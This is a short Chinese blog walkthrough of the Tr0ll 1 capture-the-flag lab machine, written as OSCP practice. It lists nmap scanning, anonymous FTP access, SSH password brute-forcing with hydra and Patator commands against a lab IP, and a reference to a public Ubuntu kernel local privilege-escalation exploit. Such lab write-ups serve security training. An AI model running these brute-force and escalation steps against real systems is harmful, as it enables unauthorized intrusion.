OSCP(基础篇靶机Tr0ll 1)
第一步:nmap
第二步:发现允许匿名访问(Anonymous/Anonymous)
是pcap数据包文件,用tcpdump分析
tcpdump用法详解:https://www.jianshu.com/p/1ff7f77e2718
sup3rs3cr3tdirlol
访问http://192.168.107.145/sup3rs3cr3tdirlol得到roflmao
下载roflmao
cd ~/Downloads
file roflmao
chmod +x roflmao
./roflmao
Find address 0x0856BF to proceed
good_luck里面内容构建用户名列表,内容包含密码(文件名为密码)
第三步:which_one_lol.txt构建用户名目录,尝试hydra有报错,直接手工得到overflow用户权限
good_luck里面内容构建用户名目录,内容包含密码(文件名为密码)
使用hydra -L进行用户名密码ssh暴力破解
hydra -L usernames -p Pass.txt 192.168.107.145 ssh -t1
有报错信息,手工尝试吧,获得overflow
之前尝试过使用Patator可暴力破解 加ignore成功
Patator 是出于使用 Hydra、美杜莎、Ncrack、Metasploit 模块和 Nmap NSE 脚本进行密码猜测攻击而沮丧而编写的。我选择了另一种方法,以免再制造一种暴力强迫工具,避免重复同样的缺点。Patator 是一种用 Python 书写的多线程工具,它努力比他的前任们更可靠、更灵活。
git clone https://github.com/lanjelot/patator.git
cd patator
python -W ignore patator.py ssh_login host=(靶机IP) user=FILE0 0=/home/kali/usernames password=Pass.txt
第四步:查看内核版本,进行权限提升
获取系统为Ubuntu 14.04.1 LTS
可通过:https://www.exploit-db.com/raw/37292(Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)本地提权)
最终成功获取root权限,并成功获取flag
完结撒花~
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· 单线程的Redis速度为什么快?
· 展开说说关于C#中ORM框架的用法!
· Pantheons:用 TypeScript 打造主流大模型对话的一站式集成库
· SQL Server 2025 AI相关能力初探